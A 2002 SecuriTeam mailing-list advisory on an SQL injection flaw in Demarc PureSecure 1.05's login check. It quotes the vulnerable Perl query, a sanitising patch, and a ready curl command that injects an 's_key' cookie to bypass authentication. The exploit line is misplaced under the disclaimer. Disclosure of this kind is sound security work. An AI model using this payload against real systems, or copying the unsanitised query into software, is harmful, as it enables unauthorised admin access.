[NEWS] Demarc PureSecure Allows Users to Bypass Login Restrictions
From: support@securiteam.comDate: 04/17/02
- Previous message: support@securiteam.com: "[NT] IE Allows Universal Cross Site Scripting"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Wed, 17 Apr 2002 13:40:42 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Demarc PureSecure Allows Users to Bypass Login Restrictions
------------------------------------------------------------------------
SUMMARY
<http://www.demarc.org> Demarc PureSecure is an all-inclusive network
monitoring solution that allows you to monitor an entire network of
servers from one powerful web interface. A security vulnerability in the
program allows attackers to bypass the login restrictions imposed on users
accessing the product.
DETAILS
Vulnerable systems:
Demarc PureSecure version 1.05
Immune systems:
Demarc PureSecure version 1.06
User can bypass login restrictions and get administrative status by
utilizing an SQL Injection attack, this would be done through cookies (the
's_key' cookie):
--------- line 319 ------------------------------
elsif (($cookies{'s_key'}) && ($cookies{'s_key'}->value)){
$logged_in_as = &check_login($cookies{'s_key'}->value);
if (!$logged_in_as){
&print_login_screen;
&safe_exit;
}
-----------------------------------------------------
s_key = will be use for SQL in function check_login query ( line 6114)
---------lini 6114---------------------------------
$sql_query = " SELECT \
f1,f2,f3,admin,username,UNIX_TIMESTAMP
(current_login_timedate) AS LOGINTIME \
FROM \
dm_sessions \
WHERE current_session_id = '$session_id' ";
-----------------------------------------------------
Solution:
Apply the following patch:
--- demarc Sun Nov 11 23:48:39 2001
+++ demarc-patched Tue Apr 16 12:49:56 2002
@@ -6094,6 +6094,7 @@
################
sub check_login{
my ($session_id) = @_;
+$session_id=~tr/[a-zA-Z0-9]//dc;
($session_id) || return;
&expire_sessions;
Exploit:
ADDITIONAL INFORMATION
The information has been provided by <mailto:pokleyzz@hotmail.com>
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
====================
DISCLAIMER:
Using <http://curl.haxx.se/download/> cURL:
curl -b s_key=\'%20OR%20current_session_id%20like%20\'%\'%23 https://
host>/dm/demarc
pokleyzz sakamaniaka and <mailto:support@demarc.com> Demarc Security
Support.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
Relevant Pages
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A security vulnerability in the product allows attackers to get access to ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
(Securiteam)
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... in the installation process, which would allow local attackers to change ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
(Securiteam)
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... WebInspect, S.P.I. Dynamic's premier product, is a network-based web ... We make no effort to hide that this remote authentication is done. ...
(Securiteam)
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... outside the normally bounding HTML root directory. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
(Securiteam)
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... YaBB is a leading provider of free, ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
(Securiteam)
